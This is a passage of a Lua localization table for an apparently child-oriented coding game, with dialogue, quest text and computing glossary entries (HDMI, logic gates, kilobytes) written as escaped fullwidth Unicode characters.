["pongQuest2"] = "\239\188\168\239\189\143\239\189\151 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\141\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\147\239\189\148 \239\189\129\239\189\151\239\189\133\239\189\147\239\189\143\239\189\141\239\189\133 \239\189\135\239\189\129\239\189\141\239\189\133 \239\189\143\239\189\134 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\133\239\189\150\239\189\133\239\189\146? \239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\140\239\189\140\239\189\129\239\189\142 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\143\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\136\239\189\149\239\189\148 \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\146\239\189\153 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\129\239\189\148 2 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147.",
["maybeLater"] = "\239\188\173\239\189\129\239\189\153\239\189\130\239\189\133 \239\189\140\239\189\129\239\189\148\239\189\133\239\189\146",
["jungleAsterix3"] = "\239\188\183\239\189\133\239\189\140\239\189\140 \239\189\132\239\189\143\239\189\142\239\189\133 \239\189\134\239\189\143\239\189\146 \239\189\135\239\189\133\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\134\239\189\129\239\189\146 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133. \239\188\183\239\189\136\239\189\153 \239\189\142\239\189\143\239\189\148 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147 \239\189\142\239\189\133\239\189\152\239\189\148?",
["mrInfoQuestTitle"] = "\239\188\165\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132",
["powerGuard3"] = "\239\188\175\239\189\136 \239\189\143\239\189\139, \239\189\151\239\189\133\239\189\140\239\189\140 \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148. \239\188\169\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\140\239\189\137\239\189\141\239\189\130 \239\189\149\239\189\144 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\143\239\189\144 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148\239\189\136\239\189\143\239\189\149\239\189\147\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\147\239\189\133\239\189\133 \239\189\137\239\189\134 \239\189\148\239\189\136\239\189\133 \239\188\172\239\188\165\239\188\164 \239\189\137\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\139\239\189\137\239\189\142\239\189\135.",
["powerGuard2"] = "\239\188\175\239\189\136 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\140\239\189\153? \239\188\183\239\189\133\239\189\140\239\189\140 \239\189\137\239\189\148\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\146\239\189\149\239\189\142\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148\239\189\136\239\189\143\239\189\149\239\189\147\239\189\133. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\151\239\189\133 \239\189\146\239\189\133\239\189\131\239\189\133\239\189\137\239\189\150\239\189\133 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\148\239\189\143 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["HDMIgirl"] = "\239\188\183\239\189\143\239\189\151, \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\144\239\189\143\239\189\146\239\189\148 \239\189\137\239\189\147 \239\189\129\239\189\141\239\189\129\239\189\154\239\189\137\239\189\142\239\189\135. \239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\137\239\189\148 \239\189\131\239\189\129\239\189\142 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\133\239\189\146 162,000,000 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\144\239\189\133\239\189\146 \239\189\147\239\189\133\239\189\131\239\189\143\239\189\142\239\189\132?",
["portetherLockedDoor"] = "404 - \239\188\174\239\189\143\239\189\148 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\132",
["minecraftAlex1"] = "\239\188\185\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\134\239\189\129\239\189\146. \239\188\173\239\189\143\239\189\147\239\189\148 \239\189\131\239\189\129\239\189\142 \239\189\143\239\189\142\239\189\140\239\189\153 \239\189\144\239\189\140\239\189\129\239\189\153 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148. \239\188\168\239\189\133\239\189\146\239\189\133, \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\143\239\189\151\239\189\142 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\146\239\189\133\239\189\147\239\189\136\239\189\129\239\189\144\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132. \239\188\178\239\189\133\239\189\129\239\189\132\239\189\153?",
["minecraftAlex3"] = "\239\188\174\239\189\137\239\189\131\239\189\133! \239\188\180\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\153\239\189\143\239\189\149 \239\189\132\239\189\143, \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\134\239\189\149\239\189\140 \239\189\153\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133.",
["minecraftAlex2"] = "\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\135\239\189\133\239\189\148 \239\189\144\239\189\129\239\189\147\239\189\148 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 5 \239\189\137\239\189\142 \239\188\168\239\189\129\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148?",
["cBitTitle"] = "\239\188\162\239\189\137\239\189\148",
["codexEmpty"] = "\239\188\174\239\189\143 \239\188\163\239\189\143\239\189\132\239\189\133\239\189\152 \239\188\169\239\189\148\239\189\133\239\189\141\239\189\147 \239\188\166\239\189\143\239\189\149\239\189\142\239\189\132",
["makeArtQuestComplete"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 3 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["jungleAsterix"] = "\239\188\169\239\189\142 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\141 \239\189\151\239\189\133 \239\189\149\239\189\147\239\189\133 \239\189\141\239\189\129\239\189\135\239\189\137\239\189\131 \239\189\151\239\189\143\239\189\146\239\189\132\239\189\147 \239\189\148\239\189\143 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140 \239\189\147\239\189\142\239\189\129\239\189\139\239\189\133\239\189\147. \239\188\180\239\189\146\239\189\153 \239\189\137\239\189\148 \239\189\143\239\189\149\239\189\148 - \239\188\169 \239\189\131\239\189\129\239\189\142 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\143\239\189\142 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 $1.",
["cLogicGateTitle"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133",
["portetherProfessorNet"] = "\239\188\183\239\189\137\239\188\166\239\189\137 \239\189\129\239\189\142\239\189\132 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\151\239\189\143 \239\189\151\239\189\129\239\189\153\239\189\147 \239\189\148\239\189\143 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148. \239\188\183\239\189\137\239\188\166\239\189\137 \239\189\147\239\189\133\239\189\142\239\189\132\239\189\147 \239\189\137\239\189\142\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\129\239\189\137\239\189\146. \239\188\183\239\189\136\239\189\137\239\189\140\239\189\133 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\137\239\189\147 \239\189\129 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\144\239\189\140\239\189\149\239\189\135\239\189\147 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["discoSloTriangle"] = "\239\188\180\239\189\136\239\189\133 \239\189\148\239\189\146\239\189\137\239\189\129\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\129 \239\189\141\239\189\143\239\189\149\239\189\142\239\189\148\239\189\129\239\189\137\239\189\142 \239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\144 \239\189\144\239\189\133\239\189\129\239\189\139\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\147\239\189\140\239\189\143\239\189\144\239\189\133\239\189\147. \239\188\169\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\129 \239\189\132\239\189\133\239\189\133\239\189\144\239\189\133\239\189\146 \239\189\130\239\189\129\239\189\147\239\189\147 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\129\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\137\239\189\142\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133.",
["cStereo"] = "\239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\189\132\239\189\137\239\189\146\239\189\133\239\189\131\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\151\239\189\143 \239\189\143\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146\239\189\147. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\135\239\189\137\239\189\150\239\189\133\239\189\147 \239\189\129 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\142\239\189\129\239\189\148\239\189\149\239\189\146\239\189\129\239\189\140 \239\189\133\239\189\134\239\189\134\239\189\133\239\189\131\239\189\148 \239\189\129\239\189\147 \239\189\137\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\129\239\189\147 \239\189\148\239\189\136\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\137\239\189\148'\239\189\147 \239\189\131\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\142 \239\189\143\239\189\142\239\189\133 \239\189\132\239\189\137\239\189\146\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142.",
["cCurrentTitle"] = "\239\188\163\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148",
["cCoordinates"] = "\239\188\161 3\239\188\164 \239\189\135\239\189\146\239\189\137\239\189\132 \239\189\136\239\189\129\239\189\147 \239\189\129\239\189\142 \239\189\152-\239\189\129\239\189\152\239\189\137\239\189\147, \239\189\129 \239\189\153-\239\189\129\239\189\152\239\189\137\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\129 \239\189\154-\239\189\129\239\189\152\239\189\137\239\189\147. \239\188\161 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148 \239\189\137\239\189\142 3\239\188\164 \239\189\147\239\189\144\239\189\129\239\189\131\239\189\133 \239\189\149\239\189\147\239\189\133\239\189\147 3 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146\239\189\147 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\133\239\189\129\239\189\131\239\189\136 \239\189\129\239\189\152\239\189\137\239\189\147 \239\189\148\239\189\143 \239\189\137\239\189\132\239\189\133\239\189\142\239\189\148\239\189\137\239\189\134\239\189\153 \239\189\137\239\189\148\239\189\147 \239\189\144\239\189\143\239\189\147\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142. \239\188\180\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148'\239\189\147 \239\189\131\239\189\143\239\189\143\239\189\146\239\189\132\239\189\137\239\189\142\239\189\129\239\189\148\239\189\133\239\189\147.",
["DevOps"] = "\239\188\164\239\189\133\239\189\150\239\188\175\239\189\144\239\189\147",
["exit"] = "\239\188\162\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\188\164\239\189\129\239\189\147\239\189\136\239\189\130\239\189\143\239\189\129\239\189\146\239\189\132?",
["minecraftAlexDiag"] = "\239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\152\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\143\239\189\151\239\189\142 \239\189\147\239\189\149\239\189\144\239\189\133\239\189\146 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148.",
["rivalKidQuestTitle"] = "\239\188\174\239\189\143 \239\189\143\239\189\142\239\189\133 \239\189\134\239\189\140\239\189\137\239\189\133\239\189\147 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\142 \239\189\141\239\189\133",
["rivalKidDiag2"] = "\239\188\185\239\189\143\239\189\149\239\189\146 \239\189\131\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\147 $1. \239\188\169'\239\189\141 \239\189\147\239\189\149\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\132\239\189\143 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146.",
["noise"] = "\239\188\174\239\189\143\239\189\137\239\189\147\239\189\133",
["cSoundWave"] = "\239\188\161 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\137\239\189\147 \239\189\144\239\189\146\239\189\143\239\189\132\239\189\149\239\189\131\239\189\133\239\189\132 \239\189\130\239\189\153 \239\189\129 \239\189\150\239\189\137\239\189\130\239\189\146\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142, \239\189\133\239\189\135: \239\189\129\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\143\239\189\141\239\189\129\239\189\135\239\189\142\239\189\133\239\189\148\239\189\137\239\189\131 \239\189\134\239\189\137\239\189\133\239\189\140\239\189\132 \239\189\147\239\189\148\239\189\137\239\189\141\239\189\149\239\189\140\239\189\129\239\189\148\239\189\133\239\189\132 \239\189\130\239\189\153 \239\189\150\239\189\143\239\189\140\239\189\148\239\189\129\239\189\135\239\189\133.",
["ok"] = "\239\188\175\239\189\139",
["devAlexB"] = "\239\188\169'\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\146\239\189\137\239\189\142\239\189\131\239\189\137\239\189\144\239\189\129\239\189\140 \239\188\179\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\188\165\239\189\142\239\189\135\239\189\137\239\189\142\239\189\133\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\139\239\189\142\239\189\143\239\189\151\239\189\147 \239\189\136\239\189\143\239\189\151 \239\189\148\239\189\143 \239\189\135\239\189\133\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\133\239\189\147\239\189\148 \239\189\144\239\189\133\239\189\146\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\142\239\189\131\239\189\133 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\178\239\189\129\239\189\147\239\189\144\239\189\130\239\189\133\239\189\146\239\189\146\239\189\153 \239\188\176\239\189\137.",
["hdmiQuestHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\133\239\189\151\239\189\147 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\133\239\189\146.",
["hdmiQuestHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\129\239\189\142 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\150\239\189\137\239\189\133\239\189\151 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164 \239\189\142\239\189\133\239\189\151\239\189\147 \239\189\131\239\189\146\239\189\133\239\189\151.",
["cKilobyte"] = "\239\188\161 \239\189\149\239\189\142\239\189\137\239\189\148 \239\189\143\239\189\134 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 8,192 \239\189\130\239\189\137\239\189\148\239\189\147.",
["makeArtQuestTitle"] = "\239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\131\239\189\143\239\189\132\239\189\133",
["minesProfessor"] = "\239\188\175\239\189\149\239\189\146 \239\189\146\239\189\133\239\189\147\239\189\133\239\189\129\239\189\146\239\189\131\239\189\136 \239\189\135\239\189\146\239\189\143\239\189\149\239\189\144 \239\189\137\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\183\239\189\133'\239\189\146\239\189\133 \239\189\132\239\189\137\239\189\135\239\189\135\239\189\137\239\189\142\239\189\135 \239\189\132\239\189\133\239\189\133\239\189\144 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\181\239\188\179\239\188\162. \239\188\176\239\189\140\239\189\133\239\189\129\239\189\147\239\189\133 \239\189\146\239\189\133\239\189\148\239\189\149\239\189\146\239\189\142 \239\189\143\239\189\142\239\189\131\239\189\133 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\129\239\189\142 \239\189\149\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133.",
["villageSummercampBoy"] = "\239\188\180\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\148\239\189\133\239\189\146\239\189\134\239\189\129\239\189\140\239\189\140\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\151\239\189\129\239\189\146\239\189\141 \239\189\130\239\189\133\239\189\131\239\189\129\239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\146\239\189\143\239\189\131\239\189\133\239\189\147\239\189\147\239\189\143\239\189\146 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\143\239\189\146\239\189\148\239\189\136 \239\189\135\239\189\133\239\189\148\239\189\147 \239\189\150\239\189\133\239\189\146\239\189\153 \239\189\136\239\189\143\239\189\148 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\137\239\189\148\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139\239\189\137\239\189\142\239\189\135!",
["powerGuard"] = "\239\188\169\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\153\239\189\143\239\189\149\239\189\146\239\189\147?",
["hdmiInterview41"] = "\239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\148\239\189\146\239\189\129\239\189\137\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\130\239\189\133 \239\189\129 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146? \239\188\183\239\189\143\239\189\151! \239\188\162\239\189\149\239\189\148 \239\189\153\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\143 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\149\239\189\144, \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\129 \239\189\148\239\189\146\239\189\149\239\189\133 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\135\239\189\133\239\189\148 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\149\239\189\142\239\189\132\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140.",
["No"] = "\239\188\174\239\189\143",
["chilledBoy"] = "\239\188\163\239\189\136\239\189\137\239\189\140\239\189\140\239\189\133\239\189\132 \239\188\162\239\189\143\239\189\153",
["hdmiQuestComplete"] = "\239\188\172\239\189\133\239\189\129\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\129\239\189\142\239\189\132 \239\189\137\239\189\148\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\139\239\189\137\239\189\142\239\189\135\239\189\147.",
["rivalKidHelp4"] = "\239\188\167\239\189\133\239\189\148 \239\189\129 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\143\239\189\134 30 \239\189\143\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\142 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129.",
["rivalKidHelp5"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\178\239\189\137\239\189\150\239\189\129\239\189\140 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\172\239\189\129\239\189\139\239\189\133.",
["discoRunner2"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146 \239\189\148\239\189\149\239\189\146\239\189\142\239\189\147 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\137\239\189\142\239\189\148\239\189\143 \239\189\150\239\189\137\239\189\130\239\189\146\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147. \239\188\180\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\129\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147, \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\129\239\189\148\239\189\148\239\189\133\239\189\146\239\189\142 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\140\239\189\140. \239\188\169 \239\189\136\239\189\143\239\189\144\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\136\239\189\133\239\189\140\239\189\144\239\189\147.",
["portetherHelp"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\143\239\189\134 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146.",
["undiscovered"] = "\239\188\181\239\189\142\239\189\132\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132",
["llComputer"] = "\239\188\172\239\188\175\239\188\167\239\188\169\239\188\163 \239\188\167\239\188\161\239\188\180\239\188\165\239\188\179:\010\239\188\161 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133 \239\189\137\239\189\147 \239\189\129 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139 \239\189\143\239\189\134 \239\189\129 \239\189\132\239\189\137\239\189\135\239\189\137\239\189\148\239\189\129\239\189\140 \239\189\131\239\189\137\239\189\146\239\189\131\239\189\149\239\189\137\239\189\148. \239\188\173\239\189\143\239\189\147\239\189\148 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\135\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\136\239\189\129\239\189\150\239\189\133 2 \239\189\137\239\189\142\239\189\144\239\189\149\239\189\148\239\189\147 \239\189\129\239\189\142\239\189\132 1 